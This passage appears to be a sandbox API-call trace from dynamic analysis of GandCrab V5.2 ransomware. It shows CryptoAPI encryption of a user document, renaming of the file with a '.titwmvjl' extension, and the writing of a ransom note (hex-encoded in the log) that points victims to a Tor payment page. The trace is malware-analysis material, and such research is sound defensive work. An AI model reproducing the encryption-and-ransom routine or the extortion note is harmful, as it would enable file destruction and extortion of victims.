hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e974*=0x100) returned 1 [0090.044] GetLastError () returned 0x0 [0090.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.044] CryptDestroyKey (hKey=0x5036f8) returned 1 [0090.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.044] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.044] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0090.045] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.045] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503778) returned 1 [0090.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.046] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0090.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.046] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e974*=0x100) returned 1 [0090.046] GetLastError () returned 0x0 [0090.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.046] CryptDestroyKey (hKey=0x503778) returned 1 [0090.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.046] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.046] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.047] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.047] ReadFile (in: hFile=0x2cc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ea20*=0xe450, lpOverlapped=0x0) returned 1 [0090.053] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xffff1bb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.053] WriteFile (in: hFile=0x2cc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xe450, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ea04*=0xe450, lpOverlapped=0x0) returned 1 [0090.054] WriteFile (in: hFile=0x2cc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0090.055] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.062] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.063] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.063] CloseHandle (hObject=0x2cc) returned 1 [0090.063] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\xyZt08shq3IZ.odt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\xyzt08shq3iz.odt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\xyZt08shq3IZ.odt.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\xyzt08shq3iz.odt.titwmvjl"), dwFlags=0x1) returned 1 [0090.064] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.064] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0090.064] FindClose (in: hFindFile=0x503378 | out: hFindFile=0x503378) returned 1 [0090.065] CloseHandle (hObject=0x2c4) returned 1 [0090.065] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0090.065] lstrcmpW (lpString1="8BuD32sh60PWiwp", lpString2=".") returned 1 [0090.066] lstrcmpW (lpString1="8BuD32sh60PWiwp", lpString2="..") returned 1 [0090.066] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\", lpString2="8BuD32sh60PWiwp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp" [0090.066] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\" [0090.066] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0090.066] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.066] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0090.066] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.066] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0090.066] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.067] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0090.067] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.067] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0090.067] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.067] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.067] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\\\TITWMVJL-DECRYPT.txt") returned 108 [0090.067] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0090.068] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\